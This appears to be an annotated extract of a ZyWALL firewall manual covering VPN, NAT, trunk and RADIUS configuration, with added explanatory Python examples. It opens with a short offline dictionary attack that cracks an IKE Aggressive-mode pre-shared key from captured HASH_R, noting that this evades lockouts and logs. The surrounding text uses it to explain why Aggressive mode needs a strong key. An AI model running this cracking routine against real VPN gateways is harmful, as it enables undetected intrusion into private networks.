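def crack_psk(x: dict, wordlist) -> Optional[str]:
    """Recompute HASH_R for each candidate and compare with the captured value.
    No packets to the gateway are needed, so lockouts and logs never trigger."""
    for cand in wordlist:
        try:
            key = parse_psk(cand)
        except ValueError:
            continue  # could not be configured on the ZyWALL in the first place
        if hmac.compare_digest(hash_r(key, x), x["hash_r"]):
            return cand
    return None


WORDLIST = ["password", "12345678", "zyxel1234", "letmein1", "Summer2010"]  # constructed
```

A main mode exchange does not give an eavesdropper HASH_R in the clear, which is why the manual's "identity protection" wording for Main matters: with Aggressive, the only defence is a key the attack above cannot enumerate.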

Page 89: ...man Group 2, a 1024-bit MODP group. DH5 refers to Diffie-Hellman Group 5, a 1536-bit MODP group. SA Life Time: Set how often the ZyWALL renegotiates the IKE SA. A short SA life time increases security, but renegotiation temporarily disconnects the VPN tunnel. NAT Traversal: Select this if the VPN tunnel must pass through NAT (there is a NAT router between the IPSec devices). Note: The remote IPSec de...

Page 90: ...er SA Life Time: Set how often the ZyWALL renegotiates the IKE SA. A short SA life time increases security, but renegotiation temporarily disconnects the VPN tunnel. Perfect Forward Secrecy (PFS): Disabling PFS allows faster IPSec setup but is less secure, because the IPSec SA keys are then derived from the IKE SA keying material, so compromising the IKE SA exposes every tunnel built from it. Select DH1, DH2 or DH5 to enable PFS. DH5 is more secure than DH1 or DH2, although it may affect throughput; the 768-bit DH1 group is far too small by current standards and should be avoided. DH1 refers to Diffie-Hellman Group 1, a 768-bit...

Page 91: ...and the VPN gateway Secure Gateway IP address or domain name of the remote IPSec device Pre Shared Key VPN tunnel password Certificate The certificate the ZyWALL uses to identify itself when setting up the VPN tunnel Local Policy IP address and subnet mask of the computers on the network behind your ZyWALL that can use the tunnel Remote Policy IP address and subnet mask of the computers on the net...

Page 92: ...5 5 8 VPN Advanced Wizard Finish Now you can use the VPN tunnel Figure 54 VPN Wizard Step 6 Advanced Note If you have not already done so you can register your ZyWALL with myZyXEL com and activate trials of services like IDP Click Close to exit the wizard ...

Page 93: ...ou configure the trunk you should configure a policy route for it as well You might also have to configure criteria for the policy route Section 6 6 on page 112 identifies the objects that store information used by other features Section 6 7 on page 113 introduces some of the tools available for system management 6 1 Object based Configuration The ZyWALL stores information or settings as objects Y...

Page 94: ...es Interfaces and Physical Ports Zones groups of interfaces and VPN tunnels simplify security settings Here is an overview of zones interfaces and physical ports in the ZyWALL Figure 55 Table 13 Zones Interfaces and Physical Ethernet Ports Zones WAN LAN DMZ A zone is a group of interfaces and VPN tunnels Use zones to apply security settings such as firewall IDP remote management anti virus and app...

Page 95: ...e tagged frames The ZyWALL automatically adds or removes the tags as needed Each VLAN can only be associated with one Ethernet interface Bridge interfaces create a software connection between Ethernet or VLAN interfaces at the layer 2 data link MAC address level Then you can configure the IP address and subnet mask of the bridge It is also possible to configure zone level security between the memb...

Page 96: ...WAN zone contains the ge2 and ge3 interfaces (physical ports 2 and 3). They use public IP addresses to connect to the Internet. The DMZ zone contains the ge4 and ge5 interfaces (physical ports 4 and 5). The DMZ zone has servers that are available to the public. These interfaces use private IP addresses (192.168.2.1 and 192.168.3.1). PORT / INTERFACE / ZONE / IP ADDRESS AND DHCP SETTINGS / SUGGESTED USE WITH DEFAULT ...

Page 97: ... and spoke VPN VPN concentrator Table 16 ZLD ZyWALL Terminology That Might Be Different Than Other Products FEATURE TERM ZLD ZYWALL FEATURE TERM Source NAT SNAT Policy route Table 17 NAT Differences Between ZLD ZyWALL and ZyNOS ZYNOS FEATURE SCREEN ZLD ZYWALL FEATURE SCREEN Trigger port port triggering Policy route Address mapping Policy route Address mapping VPN IPSec VPN Table 18 Bandwidth Manag...

Page 98: ...l interfaces, you don't need to configure anything to allow LAN-to-WAN or WLAN-to-WAN traffic. The ZyWALL automatically adds all of the external interfaces to the default WAN trunk. External interfaces include ppp, cellular and AUX interfaces, as well as any Ethernet interfaces that are set as external interfaces. Examples of internal interfaces are WLAN interfaces and any Ethernet interfaces that you con...

Page 99: ...how to route them The following figure shows how the ZLD 2 20 firmware s routing table compares with the earlier 2 1x firmware s routing table The checking flow is from top to bottom As soon as the packets match an entry in one of the sections the ZyWALL stops checking the packets against the routing table and moves on to the other checks for example the firewall check Figure 58 Routing Table Chec...

Page 100: ... dynamic IPSec rules option moves the routes for dynamic IPSec rules up above the policy routes see Section 25 2 on page 446 5 Static and Dynamic Routes This section contains the user configured static routes and the dynamic routing information learned from other routers through RIP and OSPF See Chapter 15 on page 347 for more information 6 Default WAN Trunk For any traffic coming in through an in...

Page 101: ...luding Many 1 to 1 is also included in the NAT table 3 NAT loopback is now included in the NAT table instead of requiring a separate policy route 4 SNAT is also now performed by default and included in the NAT table 6 5 Feature Configuration Overview This section provides information about configuring the main features in the ZyWALL The features are listed in the same sequence as the menu item s i...

Page 102: ...quence of menu items and tabs you should click to find the main screen s for this feature See the web help or the related User s Guide chapter for information about each screen PREREQUISITES These are other features you should configure before you configure the main screen s for this feature If you did not configure one of the prerequisites first you can often select an option to create a new obje...

Page 103: ...routing behavior in order to send packets through the appropriate interface or VPN tunnel You can also use policy routes for bandwidth management out of the ZyWALL port triggering and general NAT on the source address You have to set up the criteria next hops and NAT settings first MENU ITEM S Configuration Licensing Update PREREQUISITES Registration for anti virus and IDP application patrol Inter...

Page 104: ...have multiple WAN connections 9 Select the interface that you are using for your WAN connection ge2 and ge3 are the default WAN interfaces If you have multiple WAN connections select the trunk 10 Specify the amount of bandwidth FTP traffic can use You may also want to set a low priority for FTP traffic Note The ZyWALL checks the policy routes in the order that they are listed So make sure that you...

Page 105: ...en the Add icon. 6.5.9 DDNS: Dynamic DNS maps a domain name to a dynamic IP address. The ZyWALL helps maintain this mapping. 6.5.10 NAT: Use Network Address Translation (NAT) to make computers on a private network behind the ZyWALL available outside the private network. The ZyWALL only checks regular (through-ZyWALL) firewall rules for packets that are redirected by NAT; it does not check the to-ZyWALL firew...

Page 106: ... proxy server This can speed up web browsing because the proxy server keeps copies of the web pages that have been accessed so they are readily available the next time one of your users needs to access that page The ZyWALL does not check to ZyWALL firewall rules for packets that are redirected by HTTP redirect It does check regular through ZyWALL firewall rules Example Suppose you want HTTP reques...

Page 107: ...ss groups and services or service groups Each of these objects must be configured in a different screen To ZyWALL firewall rules control access to the ZyWALL Configure to ZyWALL firewall rules for remote management By default the firewall only allows management connections from the LAN WAN zone Example Suppose you have a SIP proxy server connected to the DMZ zone for VoIP calls You could configure...

Page 108: ...mmunication between two sites over the Internet or any insecure network that uses TCP IP for communication The ZyWALL also offers hub and spoke VPN Example See Chapter 7 on page 117 6 5 16 SSL VPN Use SSL VPN to give remote users secure network access Example See Chapter 7 on page 117 MENU ITEM S Configuration VPN IPSec VPN you can also use the Quick Setup VPN Setup wizard PREREQUISITES Interfaces...

Page 109: ...configuration screen Click the BitTorrent application patrol entry s Edit icon Set the default policy s access to Drop Add another policy Select the user account that you created for Bob You can leave the source destination and log settings at the default Note With this example Bob would have to log in using his account If you do not want him to have to log in you might create an exception policy ...

Page 110: ...s and web features such as cookies You can define which user accounts or groups can access what content and at what times You must have a subscription in order to use the category based content filtering You can subscribe using the menu item or one of the wizards Example You can configure a policy that blocks Bill s access to arts and entertainment web pages during the workday You must have alread...

Page 111: ... not available 7 Select the Arts Entertainment category you need to click Advanced to display it and click OK 8 Click General to go to the content filter general configuration screen 9 Enable the content filter 10 Add a policy that uses the schedule the filtering profile and the user that you created 6 5 23 Anti Spam Use anti spam to detect and take action on spam mail 6 5 24 Device HA To increase...

Page 112: ... groups address VPN connections local remote network NAT policy routes criteria next hop HOST NAT authentication policies firewall application patrol source destination content filter NAT HOST user settings force user authentication address groups remote management System address group Policy routes criteria firewall application patrol source destination content filter user settings force user aut...

Page 113: ...management connection through an external serial modem connected to the AUX port Example Suppose you want to allow an administrator to use HTTPS to manage the ZyWALL from the WAN 1 Create an administrator account Configuration Object User Group guest Access network services ext user The same as a user or a guest except the ZyWALL looks for the specific type in an external authentication server If ...

Page 114: ...n manage Configuration files Use configuration files to back up and restore the complete configuration of the ZyWALL You can store multiple configuration files in the ZyWALL and switch between them without restarting Shell scripts Use shell scripts to run a series of CLI commands These are useful for large repetitive configuration changes for example creating a lot of VPN tunnels and for troublesh...

Page 115: ...Always use Maintenance > Shutdown > Shutdown or the shutdown command before you turn off the ZyWALL or remove the power. Not doing so can cause the firmware to become corrupt. MENU ITEM(S): Maintenance > Shutdown ...

Page 117: ...iptions of individual screens see Technical Reference on page 207 7 1 How to Configure Interfaces Port Grouping and Zones This tutorial shows how to configure Ethernet interfaces port grouping and zones for the following example configuration see Section 6 2 2 on page 96 for the default configuration Interface ge2 uses a static IP address of 1 2 3 4 and is in the WAN zone DMZ servers are connected...

Page 118: ...7 1 1 Configure a WAN Ethernet Interface You need to assign the ZyWALL s ge2 interface a static IP address of 1 2 3 4 Click Configuration Network Interface Ethernet and double click the ge2 interface s entry Select Use Fixed IP Address and configure the IP address subnet mask and default gateway settings and click OK Figure 61 Configuration Network Interface Ethernet Edit ge2 7 1 2 Configure Zones...

Page 119: ...t to the Member box and click OK Figure 62 Configuration Network Zone WAN Edit 7 1 3 Configure Port Grouping Here is how to combine physical ports P4 and P5 into the ge4 interface port group 1 Click Configuration Network Interface Port Grouping 2 Drag physical port 5 onto representative interface ge4 and click Apply Figure 63 Configuration Network Interface Port Grouping Example ...

Page 120: ...figure a Cellular Interface. Use 3G cards for cellular WAN Internet connections. Table 264 on page 909 lists the compatible 3G devices. In this example you install or connect the 3G card before you configure the cellular interfaces, but it is also possible to reverse the sequence. 1 Make sure the 3G device's SIM card is installed. 2 Install the 3G device in the ZyWALL's PCMCIA slot or connect it to one of...

Page 121: ...llular 3G service provider 0000 in this example Figure 66 Configuration Network Interface Cellular Edit 5 Go to the Dashboard The Interface Status Summary section should contain a cellular entry When its connection status is Connected you can use the 3G connection to access the Internet Figure 67 Status 6 The ZyWALL automatically adds the cellular interface to the system default WAN trunk If the Z...

Page 122: ... for an example. 7.3 How to Configure Load Balancing: This example shows how to configure a trunk for two WAN connections to the Internet. The available bandwidth for the connections is 1 Mbps (ge2) and 512 Kbps (ge3) respectively. As these connections have different bandwidth, use the Weighted Round Robin algorithm to send traffic to the two WAN interfaces (ge2 and ge3) in a 2:1 ratio. Figure 68 Trunk Example. You do not have to c...

Page 123: ...k the ge2 entry Enter the available bandwidth 1000 kbps in the Egress Bandwidth field Click OK Figure 69 Configuration Network Interface Ethernet Edit ge2 2 Repeat the process to set the egress bandwidth for ge3 to 512 Kbps 7 3 2 Configure the WAN Trunk 1 Click Configuration Network Interface Trunk Click the Add icon ...

Page 124: 2 Name the trunk and set the Load Balancing Algorithm field to Weighted Round Robin. Add ge2 and enter 2 in the Weight column. Add ge3 and enter 1 in the Weight column. Click OK. Figure 70 Configuration > Network > Interface > Trunk > Add ...
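
The weighted round robin trunk configured in the steps above (pages 122 to 124: ge2 with weight 2, ge3 with weight 1), as an added example written for this page rather than code from the manual or the ZLD firmware. It shows the 2:1 distribution the weights produce and what happens when a member's link goes down, which the manual's trunk discussion on page 121 touches on. Treating each call as one new flow and skipping members that are down are modelling assumptions, not a statement about how the firmware schedules internally:

```python
"""Weighted round robin over trunk members. Added example, not from the manual."""


class WrrTrunk:
    """A trunk like the one on pages 123-124: {"ge2": 2, "ge3": 1}."""

    def __init__(self, weights: dict):
        self.weights = dict(weights)
        self.up = {iface: True for iface in weights}
        # Classic WRR: a member with weight w appears w times per cycle.
        self._schedule = [iface for iface, w in weights.items() for _ in range(w)]
        self._pos = 0

    def set_link(self, iface: str, up: bool) -> None:
        """Mark a member up or down (link loss, or connectivity check failure)."""
        self.up[iface] = up

    def pick(self):
        """Member for the next new flow, skipping members that are down.
        Returns None when every member is down: the trunk has no usable route."""
        n = len(self._schedule)
        for _ in range(n):
            iface = self._schedule[self._pos % n]
            self._pos += 1
            if self.up[iface]:
                return iface
        return None


def distribute(trunk: WrrTrunk, flows: int) -> dict:
    """Count how many of `flows` new flows land on each member."""
    counts = {iface: 0 for iface in trunk.weights}
    for _ in range(flows):
        iface = trunk.pick()
        if iface is not None:
            counts[iface] += 1
    return counts


if __name__ == "__main__":
    trunk = WrrTrunk({"ge2": 2, "ge3": 1})
    print(distribute(trunk, 30))       # two thirds to ge2, one third to ge3
    trunk.set_link("ge3", False)
    print(distribute(trunk, 9))        # everything to ge2 while ge3 is down
```

Weights are proportions, not bandwidth figures: the manual chose 2:1 as a rough fit for 1 Mbps against 512 Kbps, and the egress bandwidth you enter on the interface screens is what actually caps each link.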

Page 125: ...Configuration > Network > Interface > Trunk. 7.4 How to Set Up an IPSec VPN Tunnel: This example shows how to use the IPSec VPN configuration screens to create the following VPN tunnel (see Section 5.4 on page 82 for details on the VPN quick setup wizard). Figure 72 VPN Example: LAN 192.168.1.0/24 behind the ZyWALL at 1.2.3.4, LAN 172.16.1.0/24 behind the peer at 2.2.2.2 ...

Page 126: ... do not have to set up any other objects before you configure the VPN gateway because this VPN tunnel does not use any certificates or extended authentication 1 Click Configuration VPN IPSec VPN VPN Gateway and then click the Add icon 2 Enable the VPN gateway and name it VPN_GW_EXAMPLE For My Address select Interface and ge2 For the Peer Gateway Address select Static Address and enter 2 2 2 2 in t...

Page 127: ...emote network before you can set up the VPN connection 1 Click Configuration Object Address Click the Add icon 2 Give the new address object a name VPN_REMOTE_SUBNET change the Address Type to SUBNET Set up the Network field to 172 16 1 0 and the Netmask to 255 255 255 0 Click OK Figure 74 Configuration Object Address Add 3 Click Configuration VPN IPSec VPN VPN Connection Click the Add icon ...

Page 128: ... the VPN either try to connect to a device on the peer IPSec router s LAN or click Configuration VPN IPSec VPN VPN Connection and use the VPN connection screen s Connect icon 7 4 3 Configure Security Policies for the VPN Tunnel You configure security policies based on zones Assign the new VPN connection to a zone to be able to apply security policies firewall rules IDP and so on to the VPN connect...

Page 129: ...ers HQ and branch office B have USG ZyWALLs or ZyWALL 1050s Branch office A s ZyWALL uses one VPN rule to access both the headquarters HQ network and branch office B s network Branch office B s ZyWALL uses one VPN rule to access both the headquarters and branch office A s networks Figure 76 Hub and spoke VPN Example This hub and spoke VPN example uses the following settings Branch Office A ZyNOS b...

Page 130: ...10 0 0 1 VPN Connection Local Policy 192 168 169 0 255 255 255 0 Remote Policy 192 168 167 0 192 168 168 255 Disable Policy Enforcement 7 5 0 1 Hub and spoke VPN Requirements and Suggestions Consider the following when implementing a hub and spoke VPN This example uses a wide range for the ZyNOS based ZyWALL s remote network to use a narrower range see Section 25 4 1 on page 467 for an example of ...

Page 131: ... overlaps with its local network settings set ipsec swSkipOverlapIp to on to send traffic destined to A s local network to A s local network instead of through the VPN tunnel 7 6 How to Configure User aware Access Control You can configure many policies and security settings for specific users or groups of users This is illustrated in the following example where you will set up the following polic...

Page 132: ... Web Configurator 1 Click Configuration Object User Group User Click the Add icon 2 Enter the same user name that is used in the RADIUS server and set the User Type to ext user because this user account is authenticated by an external server Click OK Figure 77 Configuration Object User Group User Add 3 Repeat this process to set up the remaining user accounts 7 6 2 Set Up User Groups Set up the us...

Page 133: ...ourse you could add more members later Figure 78 Configuration Object User Group Group Add 3 Repeat this process to set up the remaining user groups 7 6 3 Set Up User Authentication Using the RADIUS Server This step sets up user authentication using the RADIUS server First configure the settings for the RADIUS server Then set up the authentication method and configure the ZyWALL to use the authent...

Page 134: ...default entry Click the Add icon Select group radius because the ZyWALL should use the specified RADIUS server for authentication Click OK Figure 80 Configuration Object Auth method Add 3 Click Configuration Auth Policy In the Authentication Policy Summary section click the Add icon 4 Set up a default policy that forces every user to log in to the ZyWALL before the ZyWALL routes traffic for them S...

Page 135: ...ers try to browse the web or use any HTTP HTTPS application the Login screen appears They have to log in using the user name and password in the RADIUS server 7 6 4 Web Surfing Policies With Bandwidth Restrictions Use application patrol AppPatrol to enforce the web surfing and MSN policies You must have already subscribed for the application patrol service You can subscribe using the Configuration...

Page 136: ...lick Configuration AppPatrol If application patrol and bandwidth management are not enabled enable them and click Apply Figure 82 Configuration AppPatrol General 2 Click the Common tab and double click the http entry Figure 83 Configuration AppPatrol Common ...

Page 137: ...3 Double click the Default policy Figure 84 Configuration AppPatrol Common http 4 Change the access to Drop because you do not want anyone except authorized user groups to browse the web Click OK Figure 85 Configuration AppPatrol Common http Edit Default ...

Page 138: ...in the Inbound and Outbound fields Click OK Repeat this process to add exceptions for all the other user groups that are allowed to browse the web Figure 86 Configuration AppPatrol Common http Edit Default 7 6 5 Set Up MSN Policies Set up a recurring schedule object first because Sales can only use MSN during specified times on specified days 1 Click Configuration Object Schedule Click the Add ico...

Page 139: ...w the steps in Section 7 6 4 on page 135 to set up the appropriate policies for MSN in application patrol Make sure to specify the schedule when you configure the policy for the Sales group s MSN access 7 6 6 Set Up Firewall Rules Use the firewall to control access from LAN to the DMZ 1 Click Configuration Firewall Add Set the From field as LAN and the To field as DMZ Set the Access field to deny ...

Page 140: ...that are allowed to access the DMZ. 7.7 How to Use a RADIUS Server to Authenticate User Accounts Based on Groups: The previous example showed how to have a RADIUS server authenticate individual user accounts. If the RADIUS server has different user groups, distinguished by the value of a specific attribute, you can make a couple of slight changes in the configuration to have the RADIUS se...

Page 141: ...tication port and key set the Group Membership Attribute field to the attribute that the ZyWALL is to check to determine to which group a user belongs This example uses Class This attribute s value is called a group identifier it determines to which group a user belongs In this example the values are Finance Engineer Sales and Boss Figure 90 Configuration Object AAA Server RADIUS Add ...
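
What the ZyWALL has to do with the server's reply in the group-based setup above (pages 140 and 141: read a group identifier out of the Class attribute), as an added example written for this page; it is not code from the manual or the ZLD firmware. It builds a RADIUS Access-Accept the way a server would, verifies the Response Authenticator before trusting anything in the packet, and only then maps the Class value to one of the page 141 group names. The shared secret, request authenticator and packet identifier are constructed, and matching Class exactly against the configured identifiers is an assumption about how the ZyWALL compares them:

```python
"""RADIUS Access-Accept verification and Class-to-group lookup.
Added example, not from the manual."""
import hashlib
import hmac
import struct
from typing import Optional

ACCESS_ACCEPT = 2
ATTR_CLASS = 25  # RFC 2865 section 5.25
GROUPS = {"Finance", "Engineer", "Sales", "Boss"}  # group identifiers from page 141


def encode_attrs(attrs) -> bytes:
    """Serialise (type, value) pairs as RADIUS TLVs: type, length incl. header, value."""
    out = b""
    for t, v in attrs:
        if len(v) > 253:
            raise ValueError("attribute value too long")
        out += struct.pack("!BB", t, len(v) + 2) + v
    return out


def build_access_accept(ident: int, request_auth: bytes, secret: bytes, attrs) -> bytes:
    """Server side. Response Authenticator = MD5(Code | ID | Length | RequestAuth |
    Attributes | Secret), RFC 2865 section 3."""
    body = encode_attrs(attrs)
    header = struct.pack("!BBH", ACCESS_ACCEPT, ident, 20 + len(body))
    resp_auth = hashlib.md5(header + request_auth + body + secret).digest()
    return header + resp_auth + body


def parse_attrs(body: bytes):
    """Walk the TLVs, rejecting any length that runs past the packet."""
    attrs, pos = [], 0
    while pos < len(body):
        if len(body) - pos < 2:
            raise ValueError("truncated attribute header")
        t, ln = body[pos], body[pos + 1]
        if ln < 2 or pos + ln > len(body):
            raise ValueError("attribute length out of range")
        attrs.append((t, body[pos + 2:pos + ln]))
        pos += ln
    return attrs


def verify_access_accept(packet: bytes, request_auth: bytes, secret: bytes) -> bool:
    """True only for an Access-Accept whose authenticator was computed with our
    shared secret over our own request authenticator; a spoofed, replayed or
    tampered reply fails here before any attribute is looked at."""
    if len(packet) < 20:
        return False
    code, _ident, length = struct.unpack("!BBH", packet[:4])
    if code != ACCESS_ACCEPT or length != len(packet):
        return False
    expected = hashlib.md5(packet[:4] + request_auth + packet[20:] + secret).digest()
    return hmac.compare_digest(expected, packet[4:20])


def group_from_class(packet: bytes) -> Optional[str]:
    """Group identifier carried in Class, or None if the user is in no configured group."""
    for t, v in parse_attrs(packet[20:]):
        if t == ATTR_CLASS:
            ident = v.decode("ascii", "replace")
            return ident if ident in GROUPS else None  # exact match assumed
    return None


def resolve_user_group(packet: bytes, request_auth: bytes, secret: bytes) -> Optional[str]:
    """The gateway's view: an unverifiable reply yields no group at all."""
    if not verify_access_accept(packet, request_auth, secret):
        return None
    return group_from_class(packet)
```

The order matters: a host on the path between the ZyWALL and the RADIUS server can inject an Access-Accept with Class "Boss" trivially, and only the authenticator check (which depends on the shared secret and the fresh request authenticator) stops it. That is also why the RADIUS key configured on the page 141 screen should be long and random rather than a word.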

Page 142: ...up User Add 3 Repeat this process to set up the remaining groups of user accounts 7 8 How to Use Endpoint Security and Authentication Policies Here is how to use endpoint security to make sure that users computers meet specific security requirements before they are allowed to access the network This example requires users to have Kaspersky Internet security or anti virus software on their computer...

Page 143: ...ntries to the allowed list you can double click an entry to move it Select Endpoint must have Anti Virus software installed and move the Kaspersky Internet Security and Kaspersky Anti Virus anti virus software entries to the allowed list The following figure shows the configuration screen example Figure 92 Configuration Object Endpoint Security Add ...

Page 144: ... an authentication policy to use endpoint security objects Enable the policy and name it Set the Source Address to LAN and the Destination Address to any the Schedule set to none and Authentication set to required to apply this policy to all users Select Force User Authentication to redirect the HTTP traffic of users who are not yet logged in to the ZyWALL s login screen Enable EPS checking and mo...

Page 145: ...age example when a user s computer does not meet an endpoint security object s requirements Click Close to return to the login screen Figure 95 Example Endpoint Security Error Message 7 9 How to Configure Service Control Service control lets you configure rules that control HTTP and HTTPS management access to the Web Configurator and separate rules that control HTTP and HTTPS ...

Page 146: ...ou configure service control to allow management or user HTTP or HTTPS access make sure the firewall is not configured to block that access 7 9 1 Allow HTTPS Administrator Access Only From the LAN This example configures service control to block administrator HTTPS access from all zones except the LAN 1 Click Configuration System WWW 2 In HTTPS Admin Service Control click the Add icon Figure 96 Co...

Page 147: ...7 4 Select the new rule and click the Add icon Figure 98 Configuration System WWW First Example Admin Service Rule Configured 5 In the Zone field select ALL and set the Action to Deny Click OK Figure 99 Configuration System WWW Service Control Rule Edit ...

Page 148: ...he LAN zone Non admin users can still use HTTPS to log into the ZyWALL from any of the ZyWALL s zones to use SSL VPN for example 7 10 How to Allow Incoming H 323 Peer to peer Calls Suppose you have a H 323 device on the LAN for VoIP calls and you want it to be able to receive peer to peer calls from the WAN Here is an example of how to configure NAT and the firewall to have the ZyWALL forward H 32...

Page 149: ...Calls Example 7 10 1 Turn On the ALG Click Configuration Network ALG Select Enable H 323 ALG and Enable H 323 transformations and click Apply Figure 102 Configuration Network ALG 7 10 2 Set Up a NAT Policy For H 323 In this example you need a NAT policy to forward H 323 TCP port 1720 traffic received on the ZyWALL s 10 0 0 8 WAN IP address to LAN IP address 192 168 1 56 10 0 0 8 192 168 1 56 ...

Page 150: ...nfiguration Object Address Add to create an address object for the public WAN IP address called WAN_IP for H323 here Then use it again to create an address object for the H 323 device s private LAN IP address called LAN_H323 here Figure 103 Create Address Objects ...

Page 151: ... Original IP to the WAN address object WAN_IP for H323 Set the Mapped IP to the H 323 device s LAN IP address object LAN_H323 Set the Port Mapping Type to Port the Protocol Type to TCP and the original and mapped ports to 1720 Click OK Figure 104 Configuration Network NAT Add 7 10 3 Set Up a Firewall Rule For H 323 The default firewall rule for WAN to LAN traffic drops all traffic Here is how to c...

Page 152: ...ALL applies NAT to traffic before applying the firewall rule Set the Service to H 323 Click OK Figure 105 Configuration Firewall Add 7 11 How to Allow Public Access to a Web Server This is an example of making an HTTP web server in the DMZ zone accessible from the Internet the WAN zone In this example you have public IP address 1 1 1 1 that you will use on the ge3 interface and map to the HTTP ser...

Page 153: ... 1 1 1 Figure 108 Creating the Address Object for the Public IP Address 7 11 2 Configure NAT You need a NAT rule to send HTTP traffic coming to IP address 1 1 1 1 on ge3 to the HTTP server s private IP address of 192 168 3 7 In the Configuration Network NAT screen click the Add icon and create a new NAT entry as follows Set the Incoming Interface to ge3 Set the Original IP to the Public_HTTP_Serve...

Page 154: ...tails Figure 109 Creating the NAT Entry 7 11 3 Set Up a Firewall Rule The firewall blocks traffic from the WAN zone to the DMZ zone by default so you need to create a firewall rule to allow the public to send HTTP traffic to IP address 1 1 1 1 in order to access the HTTP server If a domain name is registered for IP address 1 1 1 1 users can just go to the domain name to access the web server ...

Page 155: ... DMZ_HTTP DMZ_HTTP is the destination because the ZyWALL applies NAT to traffic before applying the firewall rule Set the Access field to allow and the Service to HTTP and click OK Figure 110 Configuration Firewall Add 7 12 How to Use an IPPBX on the DMZ This is an example of making an IPPBX x6004 using SIP in the DMZ zone accessible from the Internet the WAN zone In this example you have public I...

Page 156: ...address 1.1.1.2 that you will use on the ge3 interface and map to the IPPBX's private IP address of 192.168.3.7. The local SIP clients are on the LAN. Figure 111 IPPBX Example Network Topology ...

Page 157: ... Transformations and click Apply Figure 112 Configuration Network ALG 7 12 2 Create the Address Objects Use Configuration Object Address Add to create the address objects 1 Create a host address object named IPPBX DMZ for the IPPBX s private DMZ IP address of 192 168 3 9 Figure 113 Creating the Address Object for the IPPBX s Private IP Address ...

Page 158: ...N and also be able to send calls to the WAN so you set the Classification to NAT 1 1 Set the Incoming Interface to ge2 Set the Original IP to the WAN address object IPPBX Public If a domain name is registered for IP address 1 1 1 2 users can use it to connect to for making SIP calls Set the Mapped IP to the IPPBX s DMZ IP address object IPPBX DMZ Set the Port Mapping Type to Port the Protocol Type...

Page 159: ...Set Up a WAN to DMZ Firewall Rule for SIP The firewall blocks traffic from the WAN zone to the DMZ zone by default so you need to create a firewall rule to allow the public to send SIP traffic to the IPPBX If a domain name is registered for IP address 1 1 1 2 users can use it to connect to for making SIP calls ...

Page 160: ..._DMZ is the destination because the ZyWALL applies NAT to traffic before applying the firewall rule Set the Access field to allow and click OK Figure 116 Configuration Firewall Add 7 12 5 Set Up a DMZ to LAN Firewall Rule for SIP The firewall blocks traffic from the DMZ zone to the LAN zone by default so you need to create a firewall rule to allow the IPPBX to send SIP traffic to the SIP clients o...
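
The ordering the manual keeps repeating in the H.323, web server and IPPBX examples (pages 152, 155 and 160: NAT is applied before the firewall rule is matched, so the rule's destination is the mapped private address) together with the page 105 point that NAT-redirected packets are checked against through-ZyWALL rules rather than to-ZyWALL rules, as an added model written for this page; it is not code from the manual or the ZLD firmware. The interface-to-zone layout and the NAT entries come from pages 96, 149 to 153; the ZyWALL's own interface addresses and the partial rule table (only the rules those examples create, plus LAN management access from page 107) are assumptions:

```python
"""NAT-then-firewall packet model for the ZyWALL examples. Added example, not from the manual."""
from ipaddress import ip_address, ip_network

IFACE_ZONE = {"ge1": "LAN", "ge2": "WAN", "ge3": "WAN", "ge4": "DMZ", "ge5": "DMZ"}  # page 96
ZONE_NETS = {"LAN": ["192.168.1.0/24"], "DMZ": ["192.168.2.0/24", "192.168.3.0/24"]}  # page 96
ZYWALL_ADDRS = {"192.168.1.1", "192.168.2.1", "192.168.3.1", "10.0.0.8", "1.1.1.1"}  # assumed

# Virtual server entries: (incoming iface, original IP, proto, original port, mapped IP, mapped port)
NAT_TABLE = [
    ("ge2", "10.0.0.8", "tcp", 1720, "192.168.1.56", 1720),  # H.323, pages 149-151
    ("ge3", "1.1.1.1", "tcp", 80, "192.168.3.7", 80),        # HTTP server, page 153
]

# Firewall rules: (from zone, to zone, destination network or None, proto or None,
# port or None, action). First match wins; anything unmatched is denied.
FIREWALL = [
    ("WAN", "LAN", "192.168.1.56/32", "tcp", 1720, "allow"),  # page 152: mapped LAN address
    ("WAN", "DMZ", "192.168.3.7/32", "tcp", 80, "allow"),     # page 155
    ("LAN", "ZyWALL", None, None, None, "allow"),             # page 107: management from the LAN
    ("LAN", "WAN", None, None, None, "allow"),
]
# The mistake the manual warns against: matching on the public address instead.
WRONG_H323_RULE = [("WAN", "LAN", "10.0.0.8/32", "tcp", 1720, "allow")]


def apply_nat(pkt: dict) -> dict:
    """Rewrite the destination if a NAT entry matches; record whether one did."""
    for iface, oip, proto, oport, mip, mport in NAT_TABLE:
        if (pkt["in"], pkt["dst"], pkt["proto"], pkt["dport"]) == (iface, oip, proto, oport):
            return dict(pkt, dst=mip, dport=mport, natted=True)
    return dict(pkt, natted=False)


def dest_zone(pkt: dict) -> str:
    """Zone of the post-NAT destination. A redirected packet is never to-ZyWALL
    traffic even though its original destination was the ZyWALL's own WAN address."""
    if pkt["dst"] in ZYWALL_ADDRS and not pkt["natted"]:
        return "ZyWALL"
    addr = ip_address(pkt["dst"])
    for zone, nets in ZONE_NETS.items():
        if any(addr in ip_network(n) for n in nets):
            return zone
    return "WAN"


def firewall_decision(pkt: dict, rules=FIREWALL) -> str:
    """First matching rule decides; the zones are those of the translated packet."""
    src_zone, dst_zone = IFACE_ZONE[pkt["in"]], dest_zone(pkt)
    for frm, to, net, proto, port, action in rules:
        if (frm, to) != (src_zone, dst_zone):
            continue
        if net is not None and ip_address(pkt["dst"]) not in ip_network(net):
            continue
        if proto is not None and proto != pkt["proto"]:
            continue
        if port is not None and port != pkt["dport"]:
            continue
        return action
    return "deny"


def process(pkt: dict, rules=FIREWALL):
    """NAT first, then the firewall; returns (action, final destination)."""
    translated = apply_nat(pkt)
    return firewall_decision(translated, rules), translated["dst"]


if __name__ == "__main__":
    call = {"in": "ge2", "src": "203.0.113.5", "dst": "10.0.0.8", "proto": "tcp", "dport": 1720}
    print(process(call))                   # ('allow', '192.168.1.56')
    print(process(call, WRONG_H323_RULE))  # ('deny', '192.168.1.56')
```

The same property cuts the other way: a packet for 10.0.0.8 on a port with no NAT entry is to-ZyWALL traffic and is judged by the to-ZyWALL rules only, so opening tcp/1720 for the H.323 device does not expose the ZyWALL's own services.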

Page 161: ...Multiple Static Public WAN IP Addresses for LAN to WAN Traffic If your ISP gave you a range of static public IP addresses here is how to configure a policy route to have the ZyWALL use them for traffic it sends out from the LAN 7 13 1 Create the Public IP Address Range Object Click Configuration Object Address Add to create the address object that represents the range of static public IP addresses...

